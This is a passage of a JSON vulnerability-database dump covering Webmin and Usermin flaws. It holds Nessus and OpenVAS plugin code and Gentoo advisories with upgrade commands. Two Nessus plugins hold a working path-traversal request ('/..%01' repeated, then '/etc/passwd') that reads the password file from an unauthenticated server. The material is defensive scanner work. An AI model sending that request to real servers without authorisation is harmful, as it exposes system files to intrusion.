script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-admin/usermin\", unaffected:make_list(\"ge 1.220\"), vulnerable:make_list(\"lt 1.220\"))) flag++;\nif (qpkg_check(package:\"app-admin/webmin\", unaffected:make_list(\"ge 1.290\"), vulnerable:make_list(\"lt 1.290\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Webmin / Usermin\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T10:40:36", "description": "The webmin development team reports :\n\nAn attacker without a login to Webmin can read the contents of any\nfile on the server using a specially crafted URL. All users should\nupgrade to version 1.290 as soon as possible, or setup IP access\ncontrol in Webmin.", "edition": 24, "published": "2006-07-03T00:00:00", "title": "FreeBSD : webmin, usermin -- arbitrary file disclosure vulnerability (227475c2-09cb-11db-9156-000e0c2e438a)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3392"], "modified": "2006-07-03T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:usermin", "p-cpe:/a:freebsd:freebsd:webmin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_227475C209CB11DB9156000E0C2E438A.NASL", "href": "https://www.tenable.com/plugins/nessus/21789", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21789);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3392\");\n script_bugtraq_id(18744);\n\n script_name(english:\"FreeBSD : webmin, usermin -- arbitrary file disclosure vulnerability (227475c2-09cb-11db-9156-000e0c2e438a)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The webmin development team reports :\n\nAn attacker without a login to Webmin can read the contents of any\nfile on the server using a specially crafted URL. All users should\nupgrade to version 1.290 as soon as possible, or setup IP access\ncontrol in Webmin.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.webmin.com/security.html\"\n );\n # https://vuxml.freebsd.org/freebsd/227475c2-09cb-11db-9156-000e0c2e438a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7445dda8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:usermin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:webmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"webmin<1.290\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"usermin<1.220\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-20T15:45:31", "description": "The Usermin install on the remote host is affected by an information\ndisclosure flaw in the Perl script 'miniserv.pl'. This flaw could\nallow a remote, unauthenticated attacker to read arbitrary files on\nthe affected host, subject to the privileges of the web server user\nid.", "edition": 17, "published": "2014-09-16T00:00:00", "title": "Usermin 'miniserv.pl' Arbitrary File Disclosure", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3392"], "modified": "2014-09-16T00:00:00", "cpe": ["cpe:/a:webmin:usermin", "cpe:/a:usermin:usermin"], "id": "USERMIN_1220_INFO_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/77704", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77704);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2006-3392\");\n script_bugtraq_id(18744);\n\n script_name(english:\"Usermin 'miniserv.pl' Arbitrary File Disclosure\");\n script_summary(english:\"Attempts to read a local file using miniserv.pl.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by an information disclosure flaw.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Usermin install on the remote host is affected by an information\ndisclosure flaw in the Perl script 'miniserv.pl'. This flaw could\nallow a remote, unauthenticated attacker to read arbitrary files on\nthe affected host, subject to the privileges of the web server user\nid.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.webmin.com/uchanges.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade Usermin 1.220 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-3392\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:webmin:usermin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:usermin:usermin\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"usermin_detect.nbin\");\n script_require_keys(\"www/usermin\");\n script_require_ports(\"Services/www\", 20000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\napp = \"Usermin\";\nport = get_http_port(default:20000, embedded: TRUE);\nget_kb_item_or_exit('www/'+port+'/usermin');\n\ndir = '/';\ninstall_url = build_url(port:port, qs:dir);\n\n# Try to exploit the flaw to read a local file.\nfile = \"/etc/passwd\";\nexploit = \"unauthenticated\" + crap(data:\"/..%01\", length:60) + file;\n\nres = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + exploit,\n exit_on_fail : TRUE\n);\n\n# There's a problem if there's an entry for root.\nif (egrep(pattern:\"root:.*:0:[01]:\", string:res[2]))\n{\n report = NULL;\n attach_file = NULL;\n output = NULL;\n req = install_url + exploit;\n request = NULL;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n' + 'Nessus was able to exploit this issue with the following URL : ' +\n '\\n' + req + '\\n';\n\n if (report_verbosity > 1)\n {\n output = data_protection::redact_etc_passwd(output:res[2]);\n attach_file = file;\n request = make_list(req);\n }\n }\n\n security_report_v4(port:port,\n extra:report,\n severity:SECURITY_WARNING,\n request:request,\n file:attach_file,\n output:output);\n\n exit(0);\n}\naudit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-20T15:48:30", "description": "The version of Webmin installed on the remote host is affected by an\ninformation disclosure flaw due to a flaw in the Perl script\n'miniserv.pl'. This flaw could allow a remote, unauthenticated\nattacker to read arbitrary files on the affected host, subject to the\nprivileges of the web server user .", "edition": 16, "published": "2006-06-30T00:00:00", "title": "Webmin 'miniserv.pl' Arbitrary File Disclosure", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3392"], "modified": "2006-06-30T00:00:00", "cpe": ["cpe:/a:webmin:webmin"], "id": "WEBMIN_1290.NASL", "href": "https://www.tenable.com/plugins/nessus/21785", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21785);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2006-3392\");\n script_bugtraq_id(18744);\n\n script_name(english:\"Webmin 'miniserv.pl' Arbitrary File Disclosure\");\n script_summary(english:\"Tries to read a local file using 'miniserv.pl'.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote web server is affected by an information disclosure flaw.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Webmin installed on the remote host is affected by an\ninformation disclosure flaw due to a flaw in the Perl script\n'miniserv.pl'. This flaw could allow a remote, unauthenticated\nattacker to read arbitrary files on the affected host, subject to the\nprivileges of the web server user .\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.webmin.com/changes-1.290.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Webmin 1.290 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-3392\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/06/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:webmin:webmin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"webmin.nasl\");\n script_require_keys(\"www/webmin\");\n script_require_ports(\"Services/www\", 10000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\napp = 'Webmin';\nport = get_http_port(default:10000, embedded: TRUE);\nget_kb_item_or_exit('www/'+port+'/webmin');\n\ndir = \"/\";\ninstall_url = build_url(port:port, qs:dir);\n\n# Try to exploit the flaw to read a local file.\nfile = \"/etc/passwd\";\nexploit = \"unauthenticated\" + crap(data:\"/..%01\", length:60) + file;\n\nres = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + exploit,\n exit_on_fail : TRUE\n);\n\n# There's a problem if there's an entry for root.\nif (egrep(pattern:\"root:.*:0:[01]:\", string:res[2]))\n{\n report = NULL;\n attach_file = NULL;\n output = NULL;\n req = install_url + exploit;\n request = NULL;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n' + 'Nessus was able to exploit this issue with the following URL : ' +\n '\\n' +\n '\\n' + req +\n '\\n';\n\n if (report_verbosity > 1)\n {\n output = data_protection::redact_etc_passwd(output:res[2]);\n attach_file = file;\n request = make_list(req);\n }\n }\n\n security_report_v4(port:port,\n extra:report,\n severity:SECURITY_WARNING,\n request:request,\n file:attach_file,\n output:output);\n\n exit(0);\n}\naudit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T11:51:37", "description": "Webmin before 1.296 and Usermin before 1.226 does not properly handle\na URL with a null ('%00') character, which allows remote attackers to\nconduct cross-site scripting (XSS), read CGI program source code, list\ndirectories, and possibly execute programs.\n\nUpdated packages have been patched to correct this issue.\n\nUpdate :\n\nPackages are now available for Mandriva Linux 2007.", "edition": 25, "published": "2007-02-18T00:00:00", "title": "Mandrake Linux Security Advisory : webmin (MDKSA-2006:170-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4542"], "modified": "2007-02-18T00:00:00", "cpe": ["cpe:/o:mandriva:linux:2007", "p-cpe:/a:mandriva:linux:webmin"], "id": "MANDRAKE_MDKSA-2006-170.NASL", "href": "https://www.tenable.com/plugins/nessus/24556", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2006:170. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24556);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-4542\");\n script_xref(name:\"MDKSA\", value:\"2006:170-1\");\n\n script_name(english:\"Mandrake Linux Security Advisory : webmin (MDKSA-2006:170-1)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandrake Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Webmin before 1.296 and Usermin before 1.226 does not properly handle\na URL with a null ('%00') character, which allows remote attackers to\nconduct cross-site scripting (XSS), read CGI program source code, list\ndirectories, and possibly execute programs.\n\nUpdated packages have been patched to correct this issue.\n\nUpdate :\n\nPackages are now available for Mandriva Linux 2007.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:webmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.0\", reference:\"webmin-1.290-4.1mdv2007.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:52", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3912"], "description": "### Background\n\nWebmin is a web-based interface for Unix-like systems. Usermin is a simplified version of Webmin designed for use by normal users rather than system administrators. \n\n### Description\n\nJack Louis discovered that the Webmin and Usermin \"miniserv.pl\" web server component is vulnerable to a Perl format string vulnerability. Login with the supplied username is logged via the Perl \"syslog\" facility in an unsafe manner. \n\n### Impact\n\nA remote attacker can trigger this vulnerability via a specially crafted username containing format string data. This can be exploited to consume a large amount of CPU and memory resources on a vulnerable system, and possibly to execute arbitrary code of the attacker's choice with the permissions of the user running Webmin. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Webmin users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-admin/webmin-1.250\"\n\nAll Usermin users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-admin/usermin-1.180\"", "edition": 1, "modified": "2005-12-07T00:00:00", "published": "2005-12-07T00:00:00", "id": "GLSA-200512-02", "href": "https://security.gentoo.org/glsa/200512-02", "type": "gentoo", "title": "Webmin, Usermin: Format string vulnerability", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-06T19:46:07", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3392"], "description": "### Background\n\nWebmin is a web-based interface for Unix-like systems. Usermin is a simplified version of Webmin designed for use by normal users rather than system administrators. \n\n### Description\n\nA vulnerability in both Webmin and Usermin has been discovered by Kenny Chen, wherein simplify_path is called before the HTML is decoded. \n\n### Impact\n\nA non-authenticated user can read any file on the server using a specially crafted URL. \n\n### Workaround\n\nFor a temporary workaround, IP Access Control can be setup on Webmin and Usermin. \n\n### Resolution\n\nAll Webmin users should update to the latest stable version: \n \n \n # emerge --sync\n # emerge --ask --verbose --oneshot \">=app-admin/webmin-1.290\"\n\nAll Usermin users should update to the latest stable version: \n \n \n # emerge --sync\n # emerge --ask --verbose --oneshot \">=app-admin/usermin-1.220\"", "edition": 1, "modified": "2006-08-06T00:00:00", "published": "2006-08-06T00:00:00", "id": "GLSA-200608-11", "href": "https://security.gentoo.org/glsa/200608-11", "type": "gentoo", "title": "Webmin, Usermin: File Disclosure", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3912"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200512-02.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:55975", "href": "http://plugins.openvas.org/nasl.php?oid=55975", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200512-02 (webmin usermin)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Webmin and Usermin are vulnerable to a format string vulnerability which\nmay lead to the execution of arbitrary code.\";\ntag_solution = \"All Webmin users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-admin/webmin-1.250'\n\nAll Usermin users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-admin/usermin-1.180'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200512-02\nhttp://bugs.gentoo.org/show_bug.cgi?id=113888\nhttp://www.dyadsecurity.com/webmin-0001.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200512-02.\";\n\n \n\nif(description)\n{\n script_id(55975);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2005-3912\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200512-02 (webmin usermin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-admin/webmin\", unaffected: make_list(\"ge 1.250\"), vulnerable: make_list(\"lt 1.250\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"app-admin/usermin\", unaffected: make_list(\"ge 1.180\"), vulnerable: make_list(\"lt 1.180\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3392"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200608-11.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:57861", "href": "http://plugins.openvas.org/nasl.php?oid=57861", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200608-11 (webmin/usermin)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Webmin and Usermin are vulnerable to an arbitrary file disclosure through a\nspecially crafted URL.\";\ntag_solution = \"All Webmin users should update to the latest stable version:\n\n # emerge --sync\n # emerge --ask --verbose --oneshot '>=app-admin/webmin-1.290'\n\nAll Usermin users should update to the latest stable version:\n\n # emerge --sync\n # emerge --ask --verbose --oneshot '>=app-admin/usermin-1.220'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200608-11\nhttp://bugs.gentoo.org/show_bug.cgi?id=138552\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200608-11.\";\n\n \n\nif(description)\n{\n script_id(57861);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-3392\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Gentoo Security Advisory GLSA 200608-11 (webmin/usermin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres 